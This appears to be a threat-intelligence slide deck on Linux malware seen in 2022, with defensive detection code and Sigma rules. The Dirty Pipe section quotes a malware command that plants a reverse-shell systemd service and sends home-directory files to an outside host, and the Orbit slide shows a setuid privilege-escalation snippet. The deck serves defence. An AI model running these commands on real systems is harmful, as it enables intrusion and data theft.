
PRACTICAL CTI ANALYSIS OVER 2022 ITW LINUX IMPLANTS: DETECTION OVER BLIND SPOTS

2023/01/30

Joseliyo Sánchez – Senior Threat Researcher
Pedro Drimel – Principal Threat Researcher
ABOUT US

Pedro Drimel, Principal Threat Researcher: @pdrimel, /in/pdrimel/
Joseliyo Sánchez, Senior Threat Researcher: @Joseliyo_Jstnk, /in/joseluissm/

© 2022 BlackBerry. All Rights Reserved. 3


AGENDA

• Intro
• 2022 ITW Linux threats
• Similarities and detections
• Conclusions



INTRO



The community did it again

Windows: https://lolbas-project.github.io
Linux: https://gtfobins.github.io



“Common” behavior in Windows infections (high level)

[Figure: typical infection chain DOCX → PWSH → EXE → EXE]

• There can be multiple stages
• Going to the detail, many LOLBAS are used during the infection
• Sometimes, there are CVE exploitations



“Common” behavior in Linux infections (high level)

[Figure: infection chains starting from CVE exploitation, valid credentials or lateral movement, alternating SH and ELF stages, with further CVE exploitation and SH stages later in the chain]

• The initial vector is usually an exploitation, lateral movement from another infected machine, or valid credentials
• There can be multiple stages
• Going to the detail, many GTFOBins are used during the infection



Some of the most used

LOLBAS GTFOBins
Schtasks.exe Crontab
Wscript.exe Wget
Mshta.exe Bash
Certutil.exe Curl
Sc.exe Systemd service
Cmd.exe lwp-download



2022 ITW Linux threats



Linux threats observed during 2022

• CoinMiner
• Symbiote
• Orbit
• Lockbit
• Chaos
• Black Basta
• Generic Trojans
• Generic Downloaders



SYMBIOTE
• Backdoor and keylogger with data exfiltration capabilities
• User-land rootkit for persistence (T1574.006)
• DNS TXT records as the communication protocol
– dnscat2 used for exfiltration
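Symbiote's dnscat2-style exfiltration rides on DNS TXT queries, so a resolver or DNS-sensor log is where a defender can see it. The Python below is an added example, not code from the talk or from BlackBerry: it scores the leftmost label of each TXT query by length and Shannon entropy and alerts when one client repeatedly sends such queries to one base domain. The log format, the thresholds and the sample lines are all assumptions constructed for this example.

```python
import math
from collections import Counter, defaultdict

# Constructed sample resolver log (not from the talk). Assumed format:
# "<timestamp> <client_ip> <qtype> <qname>"
SAMPLE_DNS_LOG = """\
2022-06-01T10:00:01 10.0.0.5 A www.example.com
2022-06-01T10:00:02 10.0.0.5 TXT 3a9f1c2e7b0d4e6fa1c3b5d7e9f0a2c4.c2-example.test
2022-06-01T10:00:03 10.0.0.5 TXT 9c8b7a6f5e4d3c2b1a0f9e8d7c6b5a49.c2-example.test
2022-06-01T10:00:04 10.0.0.5 TXT 1f2e3d4c5b6a79880f1e2d3c4b5a6978.c2-example.test
2022-06-01T10:00:05 10.0.0.7 TXT _dmarc.example.com
2022-06-01T10:00:06 10.0.0.5 TXT 55aa66bb77cc88dd99ee00ff11223344.c2-example.test
2022-06-01T10:00:07 10.0.0.9 A mail.example.com
"""


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character of the string (0.0 for empty input)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def parse_line(line: str):
    """Split one log line into (client_ip, qtype, qname); None for malformed lines."""
    parts = line.split()
    if len(parts) != 4:
        return None
    _ts, client, qtype, qname = parts
    return client, qtype.upper(), qname.rstrip(".").lower()


def is_tunnel_like_label(label: str, min_len: int = 20, min_entropy: float = 3.0) -> bool:
    """Heuristic: encoded tunnel payloads produce long, high-entropy leftmost labels,
    while legitimate TXT lookups (_dmarc, SPF, ACME) use short fixed names."""
    return len(label) >= min_len and shannon_entropy(label) >= min_entropy


def suspicious_txt_queries(log_text: str, min_count: int = 3, **thresholds) -> dict:
    """Count tunnel-like TXT queries per (client, base domain) and keep pairs at or above min_count."""
    hits = defaultdict(int)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        client, qtype, qname = parsed
        labels = qname.split(".")
        # need at least <payload>.<domain>.<tld>; bare apex TXT lookups are not tunnels
        if qtype != "TXT" or len(labels) < 3:
            continue
        if is_tunnel_like_label(labels[0], **thresholds):
            hits[(client, ".".join(labels[-2:]))] += 1
    return {key: count for key, count in hits.items() if count >= min_count}


if __name__ == "__main__":
    for (client, domain), count in suspicious_txt_queries(SAMPLE_DNS_LOG).items():
        print(f"ALERT {client} -> {domain}: {count} tunnel-like TXT queries")
```

The base-domain grouping is deliberately crude (last two labels); in production, feed it a public-suffix list and baseline per-client TXT volume, since CDNs and mail security products also generate TXT traffic, just not with random 32-character labels.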



SYMBIOTE (2)
• Four victims confirmed
– Suspected to be related to ~30M USD in fraud
• https://www.welivesecurity.com/br/2022/03/11/operacao-anakin-pf-prende-4-suspeitos-de-invadir-o-sistema-de-informacao-da-caixa/
• Usage of valid credentials
• LPE CVE-2016-5195 (Dirty Cow)
• Locally compiled using GCC



ORBIT

• Backdoor and keylogger


• Dropper → Payload
– Optional non-persistent using /dev/shm/ldx/



ORBIT (2)

• User-land rootkit for persistence
– /etc/ld.so.preload
– Patch loader binary with payload folder

• Python for privilege escalation using SETUID (only works because the interpreter binary carries the setuid-root bit)

import os
os.setreuid(0, 0)
os.execv("/bin/bash", ("/bin/bash", "-i"))
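Orbit's two mechanisms above, the /etc/ld.so.preload entry and a setuid-root Python interpreter, are both cheap to audit. The Python below is an added example, not code from the talk: audit_preload() classifies every entry of a preload file and find_setuid_interpreters() flags setuid-root files whose basename is a script interpreter. The trusted-directory list, the interpreter list, the constructed preload body (which borrows the /dev/shm/ldx/ path mentioned above) and the stat records are assumptions for the example; scan_host() is the read-only live variant.

```python
import os
import stat
from typing import Iterable, List, Tuple

# Assumptions for this example: where legitimate preload libraries live, and which
# interpreter basenames should never carry the setuid-root bit.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")
INTERPRETERS = {"python", "perl", "ruby", "bash", "sh", "dash", "php", "node"}

# Constructed /etc/ld.so.preload body; the second entry imitates Orbit's /dev/shm/ldx/ folder.
SAMPLE_PRELOAD = """\
/lib/x86_64-linux-gnu/libfoo.so
/dev/shm/ldx/libdl.so   # constructed entry
"""

# Constructed (path, st_mode, st_uid) triples as os.lstat would report them.
SAMPLE_RECORDS = [
    ("/usr/bin/python3.8", 0o104755, 0),   # setuid-root interpreter: flagged
    ("/usr/bin/sudo", 0o104755, 0),        # setuid-root, but a normal setuid program
    ("/usr/bin/perl", 0o100755, 0),        # no setuid bit
    ("/home/user/bash", 0o104755, 1000),   # setuid, but the owner is not root
]


def audit_preload(content: str) -> List[Tuple[str, str]]:
    """Classify every entry of an /etc/ld.so.preload body.
    A populated file is rare on servers, so every entry comes back with a reason to review it;
    entries outside the trusted library dirs or with hidden path components are the rootkit pattern."""
    findings = []
    for raw in content.splitlines():
        entry = raw.split("#", 1)[0].strip()
        if not entry:
            continue
        if not entry.startswith(TRUSTED_LIB_DIRS):
            findings.append((entry, "outside trusted library dirs"))
        elif "/." in entry:
            findings.append((entry, "hidden path component"))
        else:
            findings.append((entry, "present, review"))
    return findings


def find_setuid_interpreters(records: Iterable[Tuple[str, int, int]]) -> List[str]:
    """Flag regular files that are setuid root and whose basename is a script interpreter."""
    hits = []
    for path, mode, uid in records:
        if not stat.S_ISREG(mode) or not (mode & stat.S_ISUID) or uid != 0:
            continue
        name = os.path.basename(path).rstrip("0123456789.")   # python3.8 -> python
        if name in INTERPRETERS:
            hits.append(path)
    return hits


def scan_host(preload_path: str = "/etc/ld.so.preload",
              dirs: Iterable[str] = ("/usr/bin", "/usr/local/bin", "/opt")):
    """Live, read-only variant of both checks against the real filesystem."""
    preload = ""
    try:
        with open(preload_path, "r", encoding="utf-8", errors="replace") as fh:
            preload = fh.read()
    except OSError:
        pass                                   # an absent file is the normal, healthy state
    records = []
    for d in dirs:
        for root, _subdirs, files in os.walk(d):
            for f in files:
                p = os.path.join(root, f)
                try:
                    st = os.lstat(p)
                except OSError:
                    continue
                records.append((p, st.st_mode, st.st_uid))
    return audit_preload(preload), find_setuid_interpreters(records)


if __name__ == "__main__":
    print(audit_preload(SAMPLE_PRELOAD))
    print(find_setuid_interpreters(SAMPLE_RECORDS))
```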



LOCKBIT

• Targets VMware ESXi



LOCKBIT (2)

• 50K was paid to fix Linux encryptor



Downloaders, Trojans and Generics



Dirty Pipe vulnerability - CVE-2022-0847



Dirty Pipe vulnerability - CVE-2022-0847

Fake zoom installer exploiting CVE-2022-0847

/usr/bin/su su - -c "cp /tmp/passwd.bak /etc/passwd;echo '[Unit]\nDescription=Wait until snapd is fully loaded\n[Service]\nType=simple\nUser=root\nRestart=on-failure\nRestartSec=5s\nExecStart=/bin/bash -c \"while [ 1 ]; do bash -i >& /dev/tcp/10.0.2.10/9001 0>&1; done\"\n[Install]\nWantedBy=multi-user.target' > /etc/systemd/system/snapd.loading.service;touch -t 202202230836 /etc/systemd/system/snapd.loading.service;sudo systemctl enable snapd.loading.service --now; sudo apt update >/dev/null 2>&1; sudo apt install curl >/dev/null 2>&1; sudo mount -o remount,rw,hidepid=2 /proc;find /home/ -not -path '*/.*' -name '*' -type f -exec curl -s -T {} http://10.0.2.10:8000/ \\; > /dev/null; /bin/sh"



Dirty Pipe vulnerability - CVE-2022-0847
Use of echo to create the unit file and, after that, start the service

/etc/systemd/system/snapd.loading.service
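The persistence lives in a unit file under /etc/systemd/system, so a defender can audit unit contents directly rather than only the process that wrote them. The Python below is an added example, not code from the talk: a minimal unit parser plus a check of the Exec* lines in [Service] for reverse-shell patterns. MALICIOUS_UNIT is the unit the slide's echo command is written to produce (IP and port are the values shown on the slide); BENIGN_UNIT, the pattern list and the key names checked are assumptions for the example.

```python
import re
from typing import Dict, List

# Constructed: the unit the echo command on the slide is meant to write.
MALICIOUS_UNIT = """\
[Unit]
Description=Wait until snapd is fully loaded
[Service]
Type=simple
User=root
Restart=on-failure
RestartSec=5s
ExecStart=/bin/bash -c "while [ 1 ]; do bash -i >& /dev/tcp/10.0.2.10/9001 0>&1; done"
[Install]
WantedBy=multi-user.target
"""

# Constructed benign unit for comparison.
BENIGN_UNIT = """\
[Unit]
Description=Example backup job
[Service]
Type=oneshot
ExecStart=/usr/local/bin/backup.sh --full
[Install]
WantedBy=multi-user.target
"""

# Reverse-shell indicators in a command line (assumed list; extend with your own telemetry).
REVERSE_SHELL_PATTERNS = {
    "/dev/tcp": re.compile(r"/dev/(?:tcp|udp)/"),
    "interactive shell": re.compile(r"\b(?:bash|sh|dash|zsh)\s+-i\b"),
}
EXEC_KEYS = ("ExecStartPre", "ExecStart", "ExecStartPost", "ExecReload", "ExecStop")
_SECTION = re.compile(r"^\[(?P<name>[^\]]+)\]\s*$")


def parse_unit(text: str) -> Dict[str, Dict[str, List[str]]]:
    """Minimal systemd unit parser: section -> key -> list of values (Exec* keys may repeat)."""
    sections: Dict[str, Dict[str, List[str]]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        m = _SECTION.match(line)
        if m:
            current = sections.setdefault(m.group("name"), {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)          # values may themselves contain '='
        current.setdefault(key.strip(), []).append(value.strip())
    return sections


def runs_as_root(text: str) -> bool:
    """systemd runs a service as root unless User= says otherwise."""
    service = parse_unit(text).get("Service", {})
    return service.get("User", ["root"])[-1] == "root"


def audit_unit(text: str) -> List[str]:
    """Return the sorted names of reverse-shell patterns found in any Exec* line of [Service]."""
    service = parse_unit(text).get("Service", {})
    found = set()
    for key in EXEC_KEYS:
        for value in service.get(key, []):
            for name, pattern in REVERSE_SHELL_PATTERNS.items():
                if pattern.search(value):
                    found.add(name)
    return sorted(found)


if __name__ == "__main__":
    for label, unit in (("malicious", MALICIOUS_UNIT), ("benign", BENIGN_UNIT)):
        print(label, "root" if runs_as_root(unit) else "unprivileged", audit_unit(unit))
```

Note that a benign unit also reports "root" because User= is absent; the finding that matters is the Exec* content, and the Restart=on-failure in the malicious unit is what turns a one-off shell into a persistent one.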



Dirty Pipe vulnerability - CVE-2022-0847 – Detections

3 Sigma rules created


• proc_creation_lnx_cp_passwd_tmp
• proc_creation_lnx_mount_hidepid
• proc_creation_lnx_touch_susp



[Figure: process tree of the fake zoom installer, ELF → cp, echo, touch, systemctl, apt, mount, find → curl, with the rules mapped to events during execution colour-coded by level: High, Medium, Low, Information. (*) Click on the box of the event to see the rule. Events recovered from the figure:]

• Unknown initial access
• File: fake zoom file, /home/joseliyo/linux_server64
• Event: ProcessCreate, CommandLine: cp /tmp/passwd.bak /etc/passwd
• Event: FileCreate, FileName: /etc/passwd
• Event: ProcessCreate, CommandLine: echo '[Unit]\nDescription=Wait until snapd is fully loaded\n[Service]\nType=simple\nUser=root\nRestart=on-failure\nRestartSec=5s\nExecStart=/bin/bash -c \"while [ 1 ]; do bash -i >& /dev/tcp/10.0.2.10/9001 0>&1; done\"\n[Install]\nWantedBy=multi-user.target' > /etc/systemd/system/snapd.loading.service
• Event: FileCreate, FileName: /etc/systemd/system/snapd.loading.service
• Event: ProcessCreate, CommandLine: touch -t 202202230836 /etc/systemd/system/snapd.loading.service
• Event: ProcessCreate, CommandLine: sudo systemctl enable snapd.loading.service --now
• Event: ProcessCreate, CommandLine: sudo apt install curl >/dev/null 2>&1
• Event: ProcessCreate, CommandLine: sudo mount -o remount,rw,hidepid=2 /proc
• Event: ProcessCreate, CommandLine: find /home/ -not -path '*/.*' -name '*' -type f -exec curl -s -T {} http://10.0.2.10:8000/ \\;
• Event: ProcessCreate, CommandLine: curl -s -T /home/joseliyo/linux_server64 http://10.0.2.10:8000/
• Event: NetworkConnect, DestinationIp: 10.0.2.10, DestinationPort: 8000
• Other activity in the system: execution of processes such as chmod, dpkg, apt, sort and rm



SIMILARITIES AND DETECTIONS



ORBIT



PRIORITIZE WHAT IS IMPORTANT

Drive your security in two ways
• Threat-Centric
• Technique-Centric

Techniques (columns: Chaos, CoinMiner, Downloaders, Lockbit, Orbit, Symbiote, Trojans, Total)
Security Software Discovery - T1518.001 1 1 1 1 1 1 1 7
Systemd Service - T1543.002 1 1 1 1 1 1 1 7
System Information Discovery - T1082 1 1 1 1 1 1 1 7
Command and Scripting Interpreter - T1059 1 1 1 0 1 1 1 6
Application Layer Protocol - T1071 1 1 1 1 1 1 1 7
File and Directory Permissions Modification - T1222 1 1 1 1 1 1 1 7
Disable or Modify Tools - T1562.001 1 1 1 0 0 0 1 4
Masquerading - T1036 1 1 1 1 1 1 1 7
OS Credential Dumping - T1003 1 1 1 0 0 0 1 4
Non-Application Layer Protocol - T1095 1 1 1 1 1 1 1 7
Non-Standard Port - T1571 1 1 1 0 0 0 1 4
Ingress Tool Transfer - T1105 1 1 1 0 0 0 1 4
Unix Shell Configuration Modification - T1546.004 1 1 1 0 0 0 0 3
At (Linux) - T1053.001 1 1 1 0 0 0 1 4
Encrypted Channel - T1573 1 1 1 1 1 1 1 7
File and Directory Discovery - T1083 1 1 1 1 1 1 1 7
File Deletion - T1070.004 1 1 1 1 1 1 1 7
Process Discovery - T1057 0 1 1 0 0 0 0 2
System Network Configuration Discovery - T1016 0 1 1 0 0 0 1 3
Disable or Modify System Firewall - T1562.004 0 1 1 0 0 0 0 2
Scheduled Task/Job - T1053 0 1 1 0 0 0 0 2
Obfuscated Files or Information - T1027 0 1 0 0 0 0 1 2
Indicator Removal - T1070 0 1 1 0 0 0 0 2
Hidden Files and Directories - T1564.001 0 1 1 0 1 0 1 4
Exfiltration Over Alternative Protocol - T1048 0 1 1 0 0 0 0 2
Sudo and Sudo Caching - T1548.003 0 1 1 0 0 0 0 2
Exploitation for Defense Evasion - T1211 0 1 1 0 0 0 0 2
Remote System Discovery - T1018 0 1 1 0 0 0 1 3
Data Obfuscation - T1001 0 1 0 0 0 0 1 2
Network Service Discovery - T1046 0 1 0 0 0 0 0 1
Remote Access Software - T1219 0 1 0 0 0 0 0 1
Remote Desktop Protocol - T1021.001 0 1 0 0 0 0 0 1
Hide Artifacts - T1564 0 1 1 0 0 0 0 2
Service Stop - T1489 0 1 1 0 0 0 1 3
Data from Local System - T1005 0 0 1 0 0 0 0 1
System Owner/User Discovery - T1033 0 0 1 0 0 0 0 1
Timestomp - T1070.006 0 0 1 0 0 0 0 1
Process Injection - T1055 0 0 1 0 0 0 0 1
Proxy - T1090 0 0 0 1 0 0 1 2
Total 17 34 33 11 12 11 23



PRIORITIZE WHAT IS IMPORTANT



Threat Activity

[Figure: kill-chain diagram with four intrusion columns (DirtyPipe intrusion, Orbit intrusion, Symbiote intrusion, DirtyPipe intrusion) and numbered events placed on the phases Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command & Control and Actions on objective, ending at the Victim. Legend: hypothesis event, hypothesis connection, real event, real connection]

Event table (Hypothesis / Actual):
• 1, Hypothesis: search for a Linux server to perform lateral movement and exploit vulnerability CVE-2022-0847
• 5, Actual: installation of a service in the system in order to be able to persist
• 6, Actual: exfiltration of information to a web application on the internal network acting as a proxy
• 9, Actual: use of chmod to give permissions to some files

• Data into buckets
• Helps you with clustering and attributing



High level – Diamond model for ITW Linux threats 2022

ADVERSARY
• Cyber criminal groups
• Ransomware gangs

INFRASTRUCTURE
• HTTP and HTTPS servers to distribute payloads.
• Use of encrypted protocols to share information between server and client.

CAPABILITY
• Use of utilities for Security Software Discovery like ps, htop and top with grep for filtering; uname and strings in memory related to VMs
• Abuse of systemctl to stop system services or start services created by the malware
• Use of wget and curl to perform connections and download files
• Use of chattr, chmod and chown for permissions modification
• Creation of files in suspicious folders
• Use of ls and find to discover files and directories
• Removal of artifacts and of the samples themselves

VICTIM
• Mainly Linux servers



CONCLUSIONS



Conclusions

• Privilege escalation is needed: 16 LPE CVEs in 2022.
• Remote exploitation does not necessarily lead to advanced attacks: coinminers exploiting CVE-2022-26134
• Usage of open-source weapons like TSH and Chaos RAT.
• Advanced backdoors used in targeted attacks like Symbiote and Orbit.
• GTFOBins can turn into a fully featured threat such as ransomware.

RECOMMENDATIONS
• Patch systems; for effective damage, admin privilege is required.
• On the network side, look out for exfiltration coming from a Linux box.
• SUID bits are still relevant.



OUTCOMES

• https://github.com/blackberry/threat-research-and-intelligence/tree/main/Talks/2023-01-30%20-%20SANS%20Cyber%20Threat%20Intelligence%20Summit%20%26%20Training%202023
• 5 sigma rules
– proc_creation_lnx_cp_passwd_tmp.yml
– proc_creation_lnx_mount_hidepid.yml
– proc_creation_lnx_touch_susp.yml
– proc_creation_lnx_disable_ufw.yml
– proc_creation_lnx_iptables_flush_ufw.yml
• ATT&CK MITRE Navigator layers for the samples tracked during 2022
– Orbit
– Symbiote
– Chaos
– CoinMiner
– Lockbit
– Generic Downloaders
– Generic Trojans



@pdrimel @Joseliyo_Jstnk

/in/pdrimel/ /in/joseluissm/

Thank you
© 2022 BlackBerry Limited. Trademarks, including but not limited to BLACKBERRY and EMBLEM Design are
the trademarks or registered trademarks of BlackBerry Limited and the exclusive rights to such trademarks
are expressly reserved. All other trademarks are the property of their respective owners.



CHAOS



COINMINER



LOCKBIT



SYMBIOTE



GENERIC DOWNLOADERS



GENERIC TROJANS

